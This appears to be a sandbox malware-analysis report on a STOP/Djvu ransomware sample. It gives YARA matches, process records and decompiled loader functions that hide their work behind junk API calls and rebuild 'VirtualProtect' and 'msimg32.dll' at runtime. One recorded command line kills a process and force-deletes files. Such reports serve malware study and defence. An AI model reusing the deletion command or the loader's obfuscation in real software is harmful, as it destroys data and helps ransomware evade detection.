Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.440924056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.442768730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7136, Parent PID: 2304

General

Target ID:	21
Start time:	06:52:27
Start date:	29/03/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit
Imagebase:	0xdd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7104, Parent PID: 7136

General

Target ID:	22
Start time:	06:52:27
Start date:	29/03/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7bab80000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 6488, Parent PID: 7136

General

Target ID:	23
Start time:	06:52:28
Start date:	29/03/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im build2.exe /f
Imagebase:	0x7ff669e20000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Q5W0I0pzFI.exePID: 6988, Parent PID: 5756COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.7%
Total number of Nodes:	1034
Total number of Limit Nodes:	32

Executed Functions

Function 0040A321 Relevance: 112.3, APIs: 53, Strings: 11, Instructions: 305
librarytimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0040A321(void* __ebx, void* __edi) {
				void* _v6;
				long _v8;
				long _v12;
				void* _v28;
				struct _INPUT_RECORD _v32;
				long _v36;
				struct _DCB _v64;
				char _v68;
				char _v1100;
				intOrPtr _v1108;
				void* __ebp;
				long _t45;
				void* _t64;
				intOrPtr* _t119;
				void* _t130;
				void* _t131;
				intOrPtr* _t134;
				long _t138;
				long _t160;
				void* _t161;

				if( *0x4e3424 == 3) {
					E0040D960(_t119, 0);
					E0040D910(_t119, 0, 0);
					E0040B5BE( &_v32);
					_v8 = _t138;
					_push(0);
					E0040B258(_t138);
					_push(0);
					_t119 =  &_v32;
					E0040BA6E(_t119);
					E0040D360(0);
				}
				_t130 = 0;
				L3:
				L3:
				if( *0x4e3424 == 0x47) {
					__imp__GetConsoleAliasExesA( &_v1100, 0);
					_v32.EventType = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					BuildCommDCBAndTimeoutsA("vomexozuvisuweviw",  &_v64,  &_v32);
					_v8 = 0;
					asm("stosw");
					FillConsoleOutputCharacterW();
					PeekNamedPipe(0, 0, 0, 0, 0, 0);
					__imp__GetConsoleAliasesLengthA(0, 0, 0, 0, _v8,  &_v12);
					OpenWaitableTimerW(0, 0, 0);
				}
				if(_t130 == 0x6a1) {
					goto L40;
				}
				if( *0x4e3424 == 0xf) {
					GetModuleFileNameA(0,  &_v1100, 0);
					FreeLibraryAndExitThread(0, 0);
					asm("int3");
					_push(_t130);
					_t134 = _t119;
					E0040C050(_t119, _v1108);
					 *_t134 = 0x401504;
					return _t134;
				} else {
					_t130 = _t130 + 1;
					if(_t130 < 0x53f9406) {
						goto L3;
					} else {
						L8:
						_t131 = 0;
						do {
							if(_t131 < 0x9b33) {
								GetLastError();
							}
							 *0x4e2ab0 = 0;
							if(_t131 > 0x3f56b && _v12 != 0xdfe5c2 && _v64.DCBlength != 0xdf5954 &&  *0x4e3424 == 0x28) {
								OpenMutexW(0, 0, 0);
								WriteProfileStringW(L"milatawe", L"fosoxegihulebuzizijerutabolijuvoyavifufiwajejipe", L"yoviciconocodeyogabowemabegomuso");
							}
							_t131 = _t131 + 1;
						} while (_t131 < 0x180bc451);
						_v8 = 0;
						do {
							if(_v8 == 0x40d) {
								E0040A03E(0x4e3424);
							}
							if( *0x4e3424 == 0x78) {
								GetModuleHandleA(0);
								GetPrivateProfileIntA(0, 0, 0, 0);
								EnumSystemLocalesW(0, 0);
								GetSystemTimeAdjustment(0, 0, 0);
								DebugBreak();
								__imp__MoveFileWithProgressW(L"hopevufayid", L"kucofabusitabisasavakanurogagefom", 0, 0, 0);
								SetCommState(0, 0);
								CreateMailslotW(0, _v12, 0, 0);
								WriteConsoleInputW(0, 0, 0,  &_v12);
								__imp__GetConsoleAliasExesLengthA();
								SetComputerNameA("tusiljdsfisdvfpilujawudimu");
								GlobalGetAtomNameW(0, 0, 0);
								FreeConsole();
								CreateIoCompletionPort(0, 0, 0, 0);
								GetConsoleCP();
								FreeEnvironmentStringsA(0);
								UnlockFile(0, 0, 0, 0, 0);
							}
							_v8 = _v8 + 1;
						} while (_v8 < 0x40bd22);
						E0040A14C();
						_t64 = 0;
						do {
							if(_t64 == 0x1550) {
								 *0x4e3428 =  *0x429008;
							}
							_t64 = _t64 + 1;
						} while (_t64 < 0x56a453);
						_v8 = 0;
						_t160 =  *0x4e3424; // 0x91068
						if(_t160 > 0) {
							do {
								E00409F4C(_v8);
								_v8 = _v8 + 1;
								_t161 = _v8 -  *0x4e3424; // 0x91068
							} while (_t161 < 0);
						}
						_v8 = 0;
						do {
							if(_v8 == 0x75ec5) {
								 *0x4e2abc = LoadLibraryA("kernel32.dll");
							}
							_v8 = _v8 + 1;
						} while (_v8 < 0x1756bb);
						"msimg32.dll" = 0;
						lstrcpyA("msimg32.dll", "WertualProtect");
						"msimg32.dll" = 0x56;
						"simg32.dll" = 0x69;
						 *0x4bc1c4 = GetProcAddress( *0x4e2abc, "msimg32.dll");
						_v8 = 0;
						do {
							if(_v8 == 0x1c) {
								VirtualProtect( *0x4c6880,  *0x4e3424, 0x40,  &_v12); // executed
							}
							_v8 = _v8 + 1;
						} while (_v8 < 0x3d9da7);
						E0040A160(); // executed
						if( *0x4e3424 == 0x1d) {
							WriteConsoleW(0, 0, 0,  &_v12, 0);
							DebugBreak();
							LoadLibraryA(0);
							lstrlenA(0);
							EnumResourceTypesA(0, 0, 0);
							FlushConsoleInputBuffer(0);
							SetThreadAffinityMask(0, 0);
							PulseEvent(0);
							OutputDebugStringA(0);
							ReadConsoleInputW(0,  &_v32, 0,  &_v8);
							GetPrivateProfileIntA(0, 0, 0, 0);
							__imp__CreateActCtxA( &_v68);
							GetPrivateProfileStringA(0, 0, 0, 0, 0, 0);
							GetOEMCP();
							CopyFileA(0, 0, 0);
							InterlockedExchangeAdd( &_v36, 0);
							WaitForDebugEvent(0, 0);
							FlushConsoleInputBuffer(0);
							__imp__GetConsoleAliasExesLengthW();
						}
						L0040A02D();
						return 0;
					}
				}
				L40:
				_t45 =  *0x42a100; // 0x8d792
				 *0x4e3424 = _t45;
				goto L8;
			}

0x0040a336
0x0040a339
0x0040a340
0x0040a34b
0x0040a355
0x0040a358
0x0040a359
0x0040a35e
0x0040a35f
0x0040a362
0x0040a368
0x0040a368
0x0040a36d
0x00000000
0x0040a36f
0x0040a376
0x0040a380
0x0040a388
0x0040a38e
0x0040a38f
0x0040a390
0x0040a391
0x0040a39f
0x0040a3a7
0x0040a3ae
0x0040a3ba
0x0040a3c6
0x0040a3cd
0x0040a3d6
0x0040a3d6
0x0040a3e2
0x00000000
0x00000000
0x0040a3ef
0x0040a6de
0x0040a6e6
0x0040a6ec
0x0040a6f0
0x0040a6f4
0x0040a6f6
0x0040a6fb
0x0040a705
0x0040a3f5
0x0040a3f5
0x0040a3fc
0x00000000
0x0040a402
0x0040a402
0x0040a402
0x0040a404
0x0040a40a
0x0040a40c
0x0040a40c
0x0040a418
0x0040a41e
0x0040a43e
0x0040a453
0x0040a453
0x0040a459
0x0040a45a
0x0040a46e
0x0040a471
0x0040a478
0x0040a47f
0x0040a47f
0x0040a48b
0x0040a492
0x0040a49c
0x0040a4a0
0x0040a4a9
0x0040a4af
0x0040a4be
0x0040a4c6
0x0040a4d2
0x0040a4df
0x0040a4e5
0x0040a4f0
0x0040a4f9
0x0040a4ff
0x0040a509
0x0040a50f
0x0040a516
0x0040a521
0x0040a521
0x0040a527
0x0040a52a
0x0040a537
0x0040a53c
0x0040a53e
0x0040a543
0x0040a54b
0x0040a54b
0x0040a551
0x0040a552
0x0040a559
0x0040a55c
0x0040a562
0x0040a564
0x0040a567
0x0040a56c
0x0040a572
0x0040a572
0x0040a564
0x0040a57a
0x0040a57d
0x0040a584
0x0040a591
0x0040a591
0x0040a596
0x0040a599
0x0040a5ac
0x0040a5b2
0x0040a5c3
0x0040a5ca
0x0040a5d7
0x0040a5dc
0x0040a5df
0x0040a5e3
0x0040a5f7
0x0040a5f7
0x0040a5fd
0x0040a600
0x0040a609
0x0040a615
0x0040a623
0x0040a629
0x0040a62c
0x0040a633
0x0040a63c
0x0040a649
0x0040a64d
0x0040a654
0x0040a65b
0x0040a66b
0x0040a675
0x0040a67b
0x0040a687
0x0040a68d
0x0040a696
0x0040a6a1
0x0040a6a9
0x0040a6b0
0x0040a6b2
0x0040a6b2
0x0040a6b8
0x0040a6c3
0x0040a6c3
0x0040a3fc
0x0040a6c6
0x0040a6c6
0x0040a6cb
0x00000000

APIs

__wremove.LIBCMTD ref: 0040A339

Part of subcall function 0040D960: DeleteFileA.KERNEL32(?,?,?,0040A33E,00000000), ref: 0040D96A
Part of subcall function 0040D960: GetLastError.KERNEL32(?,?,0040A33E,00000000), ref: 0040D974
Part of subcall function 0040D960: __dosmaperr.LIBCMTD ref: 0040D990

__wrename.LIBCMTD ref: 0040A340

Part of subcall function 0040D910: MoveFileA.KERNEL32 ref: 0040D91E
Part of subcall function 0040D910: GetLastError.KERNEL32(?,?,0040A345,00000000,00000000,00000000), ref: 0040D928
Part of subcall function 0040D910: __dosmaperr.LIBCMTD ref: 0040D944

Part of subcall function 0040B5BE: __EH_prolog.LIBCMT ref: 0040B5C3

Part of subcall function 0040B258: __EH_prolog.LIBCMT ref: 0040B25D

Part of subcall function 0040BA6E: __EH_prolog.LIBCMT ref: 0040BA73

Part of subcall function 0040D360: _doexit.LIBCMTD ref: 0040D36D

GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 0040A380
BuildCommDCBAndTimeoutsA.KERNEL32(vomexozuvisuweviw,?,?), ref: 0040A39F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 0040A3BA
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A3C6
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0040A3CD
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0040A3D6
GetLastError.KERNEL32 ref: 0040A40C
OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 0040A43E
WriteProfileStringW.KERNEL32(milatawe,fosoxegihulebuzizijerutabolijuvoyavifufiwajejipe,yoviciconocodeyogabowemabegomuso), ref: 0040A453
GetModuleHandleA.KERNEL32(00000000), ref: 0040A492
GetPrivateProfileIntA.KERNEL32 ref: 0040A49C
EnumSystemLocalesW.KERNEL32(00000000,00000000), ref: 0040A4A0
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0040A4A9
DebugBreak.KERNEL32 ref: 0040A4AF
MoveFileWithProgressW.KERNEL32(hopevufayid,kucofabusitabisasavakanurogagefom,00000000,00000000,00000000), ref: 0040A4BE
SetCommState.KERNEL32(00000000,00000000), ref: 0040A4C6
CreateMailslotW.KERNEL32 ref: 0040A4D2
WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040A4DF
GetConsoleAliasExesLengthA.KERNEL32 ref: 0040A4E5
SetComputerNameA.KERNEL32(tusiljdsfisdvfpilujawudimu), ref: 0040A4F0
GlobalGetAtomNameW.KERNEL32 ref: 0040A4F9
FreeConsole.KERNEL32 ref: 0040A4FF
CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A509
GetConsoleCP.KERNEL32 ref: 0040A50F
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040A516
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040A521
LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040A58B
lstrcpyA.KERNEL32(msimg32.dll,WertualProtect), ref: 0040A5B2
GetProcAddress.KERNEL32(msimg32.dll), ref: 0040A5D1
VirtualProtect.KERNELBASE(00000040,?), ref: 0040A5F7
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040A623
DebugBreak.KERNEL32 ref: 0040A629
LoadLibraryA.KERNEL32(00000000), ref: 0040A62C
lstrlenA.KERNEL32(00000000), ref: 0040A633
EnumResourceTypesA.KERNEL32 ref: 0040A63C
FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0040A649
SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0040A64D
PulseEvent.KERNEL32(00000000), ref: 0040A654
OutputDebugStringA.KERNEL32(00000000), ref: 0040A65B
ReadConsoleInputW.KERNEL32(00000000,?,00000000,003D9DA7), ref: 0040A66B
GetPrivateProfileIntA.KERNEL32 ref: 0040A675
CreateActCtxA.KERNEL32 ref: 0040A67B
GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A687
GetOEMCP.KERNEL32 ref: 0040A68D
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040A696
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040A6A1
WaitForDebugEvent.KERNEL32(00000000,00000000), ref: 0040A6A9
FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0040A6B0
GetConsoleAliasExesLengthW.KERNEL32 ref: 0040A6B2

Strings

milatawe, xrefs: 0040A44E
tusiljdsfisdvfpilujawudimu, xrefs: 0040A4EB
yoviciconocodeyogabowemabegomuso, xrefs: 0040A444
msimg32.dll, xrefs: 0040A5A7, 0040A5AC, 0040A5B8
2hB, xrefs: 0040A54B
kernel32.dll, xrefs: 0040A586
kucofabusitabisasavakanurogagefom, xrefs: 0040A4B4
fosoxegihulebuzizijerutabolijuvoyavifufiwajejipe, xrefs: 0040A449
hopevufayid, xrefs: 0040A4B9
WertualProtect, xrefs: 0040A5A2
vomexozuvisuweviw, xrefs: 0040A39A

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Console$File$DebugInputProfile$AliasCreateErrorExesH_prologLastLengthPrivateStringWrite$BreakBufferCommEnumEventFlushFreeLibraryLoadMoveNameOpenOutputSystem__dosmaperr$AddressAdjustmentAffinityAliasesAtomBuildCharacterCompletionComputerCopyDeleteEnvironmentExchangeFillGlobalHandleInterlockedLocalesMailslotMaskModuleMutexNamedPeekPipePortProcProgressProtectPulseReadResourceStateStringsThreadTimeTimeoutsTimerTypesUnlockVirtualWaitWaitableWith__wremove__wrename_doexitlstrcpylstrlen
String ID: 2hB$WertualProtect$fosoxegihulebuzizijerutabolijuvoyavifufiwajejipe$hopevufayid$kernel32.dll$kucofabusitabisasavakanurogagefom$milatawe$msimg32.dll$tusiljdsfisdvfpilujawudimu$vomexozuvisuweviw$yoviciconocodeyogabowemabegomuso
API String ID: 6355672-3549957837
Opcode ID: a5ba742ab6c34baf8cc74debc4477e02a44df036d125da53f88301dd1c200f3b
Instruction ID: 840761d797e201f4904ff2262eac19da88a8168daedba6e74ce979b7dc314e2b
Opcode Fuzzy Hash: a5ba742ab6c34baf8cc74debc4477e02a44df036d125da53f88301dd1c200f3b
Instruction Fuzzy Hash: E4A12EB5800248FFD705ABB4EEC9DAE767CEB0834AB105436F602B61B2C6784D548B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A160 Relevance: 49.1, APIs: 23, Strings: 5, Instructions: 136
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E0040A160() {
				struct _STARTUPINFOA _v72;
				char _v1096;
				char _v2120;
				int _t4;
				struct _OSVERSIONINFOEXA* _t23;
				void* _t25;
				void* _t26;

				_t23 = 0;
				while(1) {
					SetLastError(0);
					if( *0x4e3424 == 0x16) {
						SetConsoleCursorInfo(0, 0);
						DebugBreak();
						__imp__SetCalendarInfoW(0, 0, 0, 0);
					}
					SetLastError(0);
					if( *0x4e3424 == 0x9e) {
						CopyFileA(0, 0, 0);
						__imp__GetSystemWow64DirectoryW( &_v2120, 0);
						GetStartupInfoA( &_v72);
					}
					if(_t23 > 0x3775ee) {
						break;
					}
					_t23 =  &(_t23->dwOSVersionInfoSize);
					if(_t23 < 0x332beaf6) {
						continue;
					}
					break;
				}
				_t4 = E00409E23( *0x4c6880,  *0x4e3424, 0x429010);
				_t25 = 0;
				do {
					if( *0x4e3424 == 0x10) {
						InterlockedDecrement(0);
						_t4 = SetConsoleTextAttribute(0, 0);
						__imp__SetDllDirectoryW(L"gixipujeza");
					}
					if(_t25 == 0x1e673) {
						_t4 = E0040A033(_t4);
					}
					_t25 = _t25 + 1;
				} while (_t25 < 0x3e79e);
				_t26 = 0xdd9a7;
				do {
					if( *0x4e3424 == 0xc01) {
						TerminateThread(0, 0);
						GetUserDefaultLCID();
						WritePrivateProfileStringW(0, 0, 0, 0);
						GetNamedPipeHandleStateA(0, 0, 0, 0, 0, 0, 0);
					}
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				"msimg32.dll" = 0x6d;
				"simg32.dll" = 0x73;
				 *0x4bc1d2 = 0x6c;
				 *0x4bc1ce = 0x32;
				"img32.dll" = 0x69;
				"32.dll" = 0x33;
				 *0x4bc1d3 = 0;
				M004BC1CC = 0x67;
				 *0x4bc1d0 = 0x64;
				M004BC1CB = 0x6d;
				 *0x4bc1d1 = 0x6c;
				 *0x4bc1cf = 0x2e; // executed
				LoadLibraryA("msimg32.dll"); // executed
				if( *0x4e3424 == 0x1144) {
					GetModuleHandleW(L"megurorapav");
					__imp__SetDllDirectoryA(0);
					FormatMessageA(0, 0, 0, 0,  &_v1096, 0, 0);
					_push(0);
					VerifyVersionInfoA(0, 0, 0);
					FindFirstChangeNotificationA("ofuzi", 0, 0);
					GlobalFix(0);
					_push(0);
					VerifyVersionInfoA(0, 0, 0);
				}
				return 0;
			}

0x0040a174
0x0040a176
0x0040a177
0x0040a180
0x0040a184
0x0040a18a
0x0040a194
0x0040a194
0x0040a19b
0x0040a1a7
0x0040a1ac
0x0040a1ba
0x0040a1c4
0x0040a1c4
0x0040a1d0
0x00000000
0x00000000
0x0040a1d2
0x0040a1d9
0x00000000
0x00000000
0x00000000
0x0040a1d9
0x0040a1ec
0x0040a1f1
0x0040a1f3
0x0040a1fa
0x0040a1fd
0x0040a205
0x0040a210
0x0040a210
0x0040a21c
0x0040a21e
0x0040a21e
0x0040a223
0x0040a224
0x0040a22c
0x0040a231
0x0040a23b
0x0040a23f
0x0040a245
0x0040a24f
0x0040a25c
0x0040a25c
0x0040a262
0x0040a262
0x0040a26a
0x0040a271
0x0040a278
0x0040a27f
0x0040a286
0x0040a28d
0x0040a294
0x0040a29a
0x0040a2a1
0x0040a2a8
0x0040a2af
0x0040a2b6
0x0040a2bd
0x0040a2cd
0x0040a2d4
0x0040a2db
0x0040a2ee
0x0040a2fa
0x0040a2fe
0x0040a307
0x0040a30e
0x0040a314
0x0040a318
0x0040a318
0x0040a320

APIs

SetLastError.KERNEL32(00000000), ref: 0040A177
SetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 0040A184
DebugBreak.KERNEL32 ref: 0040A18A
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A194
SetLastError.KERNEL32(00000000), ref: 0040A19B
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040A1AC
GetSystemWow64DirectoryW.KERNEL32(?,00000000), ref: 0040A1BA
GetStartupInfoA.KERNEL32(?), ref: 0040A1C4
InterlockedDecrement.KERNEL32(00000000), ref: 0040A1FD
SetConsoleTextAttribute.KERNEL32(00000000,00000000), ref: 0040A205
SetDllDirectoryW.KERNEL32 ref: 0040A210
TerminateThread.KERNEL32(00000000,00000000), ref: 0040A23F
GetUserDefaultLCID.KERNEL32 ref: 0040A245
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A24F
GetNamedPipeHandleStateA.KERNEL32 ref: 0040A25C
LoadLibraryA.KERNELBASE(msimg32.dll), ref: 0040A2BD
GetModuleHandleW.KERNEL32(megurorapav), ref: 0040A2D4
SetDllDirectoryA.KERNEL32 ref: 0040A2DB
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040A2EE
VerifyVersionInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A2FE
FindFirstChangeNotificationA.KERNEL32(ofuzi,00000000,00000000), ref: 0040A307
GlobalFix.KERNEL32 ref: 0040A30E
VerifyVersionInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040A318

Strings

megurorapav, xrefs: 0040A2CF
msimg32.dll, xrefs: 0040A265
u7, xrefs: 0040A1CA
gixipujeza, xrefs: 0040A20B
ofuzi, xrefs: 0040A302

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Info$Directory$ConsoleErrorHandleLastVerifyVersion$AttributeBreakCalendarChangeCopyCursorDebugDecrementDefaultFileFindFirstFormatGlobalInterlockedLibraryLoadMessageModuleNamedNotificationPipePrivateProfileStartupStateStringSystemTerminateTextThreadUserWow64Write
String ID: gixipujeza$megurorapav$msimg32.dll$ofuzi$u7
API String ID: 1609752788-1493580139
Opcode ID: 386b72be17f28628f0a472091ab787743f22a9907e4ae56f6e8d052252f18ba1
Instruction ID: ea68edc82c133b7cb999284613651bee1551b6b47e1f008b58c7ac351b0d1aa6
Opcode Fuzzy Hash: 386b72be17f28628f0a472091ab787743f22a9907e4ae56f6e8d052252f18ba1
Instruction Fuzzy Hash: 394142B28042C8EFE7015B74ADC8E6B3A6DE714389F001476F586B65B3C6794C948B7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6F7 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040E6F7() {
				signed int _t79;
				signed int _t80;
				intOrPtr _t81;
				signed int _t97;
				void* _t102;
				void* _t103;
				signed int _t105;
				void* _t109;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				void* _t116;
				signed int _t122;
				signed int _t123;
				intOrPtr _t126;
				signed int _t127;
				signed int _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				signed int _t169;
				signed int _t170;
				void* _t171;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t178;
				void* _t188;
				void* _t192;

				_t178 = _t177 + 4;
				 *(_t175 - 4) = 0;
				if( *0x4e3514 > 0) {
					_t112 =  *0x4e3514; // 0x0
					_t188 =  *0x4e34fc - _t112 - 1; // 0x0
					if(_t188 != 0) {
						_t169 =  *0x4e34fc; // 0x0
						_t170 = _t169 + 1;
						__eflags = _t170;
						 *0x4e34fc = _t170;
					} else {
						if(E0040F9D0() == 0) {
							_push(L"_CrtCheckMemory()");
							_push(0);
							_push(0x179);
							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c");
							_push(2);
							_t115 = L0040C820();
							_t178 = _t178 + 0x14;
							if(_t115 == 1) {
								asm("int3");
							}
						}
						 *0x4e34fc = 0;
					}
				}
				_t79 =  *0x4bb4e0; // 0x34
				 *(_t175 - 0x28) = _t79;
				if( *0x4bb4e4 != 0xffffffff) {
					_t192 =  *(_t175 - 0x28) -  *0x4bb4e4; // 0xffffffff
					if(_t192 == 0) {
						asm("int3");
					}
				}
				if( *0x4bb7a0 == 0) {
					L19:
					__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 2;
					if(( *(_t175 + 0xc) & 0x0000ffff) != 2) {
						_t105 =  *0x4bb4d8; // 0x1
						__eflags = _t105 & 0x00000001;
						if((_t105 & 0x00000001) == 0) {
							 *(_t175 - 0x1c) = 1;
						}
					}
					__eflags =  *((intOrPtr*)(_t175 + 8)) - 0xffffffbc;
					if( *((intOrPtr*)(_t175 + 8)) <= 0xffffffbc) {
						__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 4;
						if(( *(_t175 + 0xc) & 0x0000ffff) != 4) {
							__eflags =  *(_t175 + 0xc) - 1;
							if( *(_t175 + 0xc) != 1) {
								__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 2;
								if(( *(_t175 + 0xc) & 0x0000ffff) != 2) {
									__eflags =  *(_t175 + 0xc) - 3;
									if( *(_t175 + 0xc) != 3) {
